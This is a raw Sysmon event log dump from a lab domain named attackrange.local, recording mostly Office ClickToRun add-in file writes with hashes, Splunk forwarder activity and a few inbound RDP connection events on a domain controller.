23542300x800000000000000068621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exeMD5=9AA0C3C29569812136172F39E2C408DC,SHA256=0CB21BD17660F71CAB1280816AB01F132D3CAF8FEBCDDBFCC9A7FE06B8EC99BF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeMD5=FA35B1203DF55219CC209DBEC9DAB86C,SHA256=44102151CB9B1D8BAC1099BA4299F9BAA4886C58FBD1CE148AAD42C460A0A83B,IMPHASH=B7E5875BE70879A65091A72B4DA94522truetrue 23542300x800000000000000068619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe.configMD5=D1A07403B1FECD2FBA724CBBF80D5C95,SHA256=B081DE573BB6B567AEDDB28B29A6D3952EED70D382AB81995DBF6B646BF71270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exeMD5=708E64ADB730A6CD6A97F9E514B21137,SHA256=CBD0EAAEA8CE234DFB587788D5D42646AFEE8AC06BF7A82D3213DCF311CE07CD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.UI.dllMD5=0E1598D5E7DC199FB354EBAF2EBC532D,SHA256=50B94438C445B318138741B3D68A752687F8F98BD2D64961D44AB44062F6DA29,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.611{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82D38DF631AF36F06A34165B4C339254,SHA256=A099D705A0C1A25643476D7078A1923366B2841B9842A9F331EE795BD0245E2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Packaging.dllMD5=DB7F2FE3BBDACE4090F6AA9DEF4B7231,SHA256=830B9974686D49317FA39EE273290726FC84E056E23604EAF6D2E1992B1FD3E1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Models.dllMD5=90C4E2A23295C27D555527C2AA6CB51C,SHA256=98E9352606606FB5FFB11388696E586B0D1A0B7D975BA1EF56D0F8B7723EF008,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.Themes.dllMD5=5267553D2766E4870097DD286579DC83,SHA256=B1DD5DBFB7BAF2BD229E51428EEE99770CF09B926874C405C6FC6AD4DD98F6D2,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 354300x800000000000000068612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.618{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-24943-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000068611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.487{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-27672-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000068610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.290{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57501-false10.0.1.12-8000- 23542300x800000000000000049739Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:18.752{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E799BF252106EBA6C83C488369DAD13,SHA256=EC64DAEB149503C743BEE63DFA1C626E4FE190E81EAC9744C761DD8D572DC6F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.Common.FrontEnd.dllMD5=32DC5496E8FB40DCF0D104965EF53E14,SHA256=7D940AD4B2DC5B76FD58E3E8A0FFAAC18C11EC1C04C3E54FD34C1D5A70F0FC90,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.BackEnd.XmlSerializers.dllMD5=6BB9891539F5302602E79E7608B0B3D7,SHA256=89C9C6FAD9D43F2E9667C15F476A2F8C48FD9D76E3A42FF1240949EF6490A85D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.BackEnd.dllMD5=2B5EDF4599F9C704F64732CC488B724B,SHA256=B8162CA197DDFB05EDC09F07C782661A5EB5731C37AEDF886CE11848E6C1C249,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Common.Wizard.dllMD5=475B174B9CBFCA017C2E37960ABAEC07,SHA256=601FF757E7B0D5F6EDFB9F7AB96460D5751F248C1DAEB124B7DC8B0E90F68603,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Common.dllMD5=6F2E82A474160E1C5E1A7F7765B3F2F1,SHA256=AA0AFA7FC20B467DCCADE67CA935DFBFD26B950FB845AA48A923468545A82808,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Interop.MSDASC.dllMD5=75060FC6921D523D804FC7C9821D0B0E,SHA256=1A6F83AAFCC00F1882145CCDA08E44D1DC29BE8030473FE671C5ABF2E1A8CC0F,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources\1033\PowerPivotExcelClientAddIn.rllMD5=B5CC2F64E4EF8F21780B1E90F584B897,SHA256=B70B7371B94EC94C5D943562AF5764BA87225EF7D93F98BA80D6910357749C81,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\trdtv2r41.xslMD5=AFEBC8CDAFB90959800184887DC7F1AC,SHA256=C196C51D3A2D29369D24AFA80531ECAAE652C079E1A2B3F67247D90A9B92CFAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\Sybase.xslMD5=A16E716031AC4E6BDBD6F35A5AF6CB98,SHA256=A3CD6B7BFE0FF5CD9AFDAA2EEBB221A46E753EBF5EF410B65A14AE866E3D2AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sqlpdw.xslMD5=8A573404F2B93CF45F19C5DB5CEA8230,SHA256=1389EDB75CFB19FB9D1C86ABFD9FEE7F69B5A46E5FF1ADCF6BE5F8E017669142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sql90.xslMD5=00AB2E6AF317B027233584CA05B0AF78,SHA256=E0E9D0B9A0F40B597CC6381BF1EC8337E1DEB4CD6A121DF26816C508F85A4760,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sql70.xslMD5=677C55508FD93BFE1011659B6B85B17C,SHA256=4009EDE1F98F1AB1578C427F3CCB2C3259192A3A1AF14276B16C4448240A7C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sql2000.xslMD5=3D6DBDBCC35A81D0FB9FC99B3B09D3A5,SHA256=C79059B62CBC069F855D5DA1E3CC8EBCFD1D20F2A3FCF4E7C089985E19B88097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\sql120.xslMD5=19DA910ECF9A0F33C52F49A9F7CE8FE7,SHA256=948B839BA0942AE0BB5BB05B2C210768F6E1676E5EF2BB7BE3400EBB97D96B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\orcl7.xslMD5=3053094B1445D6C292CC925F1B2E8506,SHA256=509A7E04DC2BB81FF781315AB182A738FFAB8AF059BD267D1D4B24A7498DB318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\msjet.xslMD5=231AAB1CFA3C63327AD073DBB3D4371C,SHA256=CC200681625401A916F79EDA7BB6A179EE4BDE670A4AAD80FCB9C1167493EF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\Informix.xslMD5=F7380302CE9306A970E8602D74173066,SHA256=44BEF02DABBD62124A6310C2E73177F4ADFF4EABC6A10A4A73D3E0CF9BE55114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\hive.xslMD5=5C873DAC161FFFBF25A13A928239958D,SHA256=6282498E63BAC2F13E302A789E21DBCA794AB1C4923660C0E330F931B8EAD0A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\db2v0801.xslMD5=FE2B9A3979B7882D55A92B06E2EBE4AD,SHA256=C686C484CE89B8E05575F70334E2B563B54A094708F4F4F79BA215C67EE07EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\as90.xslMD5=4B56DB7920F1DBD4ABC838AE3DB5B715,SHA256=521B163EADDB0EFBD741ABF553CB812594865EE0657AF9DFCD672DCA09BAB529,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\as80.xslMD5=3F180E80B895CF04EC5E99DD7B63445E,SHA256=CFD3F8C4BAA855CEB0E45C3254B2975EFD43498226844C5D5765041AEF89B52A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.ProgressiveProcessing.dllMD5=1AD8CD3C4F4E57FB733556A8F1EFED04,SHA256=0D7CF86E15E75EFA741129468E6B73973AC99E2C90DEC280E1C90332D770495B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.Interfaces.dllMD5=EB204F0532982306C489DBF680AB13A2,SHA256=78084A10155CC89179FC25D82667DE79A4F2E9626002A111644FE24456969D25,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.Authorization.dllMD5=ADCF1005C3DC0807BB827FA9747D8344,SHA256=B66930848E127DF5D12BFEABFF1FD476B19BE71031B20DBECA6FC5C508B761B1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dllMD5=B75C6093CD2584C91D76E492DCAD347E,SHA256=A99AE0544BA8DB40D205CB0D201E216CB7B611CA58A8C07FA178CDE3E85127A1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.AdHoc.Excel.Client.dllMD5=2B9E8C08D380E8F5778D5C85F267B356,SHA256=F27ED9ECCE6F9A8A9EF17F1AA5864DE4657E079AC415D73FC3B49E9CD2AE5C40,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.Reporting.Common.dllMD5=4E348BD441F37C350771BCDE2A8FD647,SHA256=6D0E006E4FEFD1227FFF507ADBB486717E1BE1C9CBBF7BF79B8738DDA997ACFA,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xapMD5=FB7B16EA27ACF5266FD7846B024AC5BB,SHA256=FED37C1C9D3EAF66F1C6956C67FEEF7BDB56B78134FD844D1F36758AE773D97C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.PowerBI.Diagnostics.dllMD5=C522FF79C042FBE0B78572BC6DB760A7,SHA256=DBCCA6A6C8E73E447110604F832852EEA168C2B1D6D87D6C4CA573E2570563F4,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:19.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.PowerBI.AdomdDataExtension.dllMD5=CEADCDE4468BEFA6697DA89CF1A6CDE7,SHA256=1BB74DA533B21A4ECC3DC43BBED056B474439E380B649496389848F71A64DE5E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 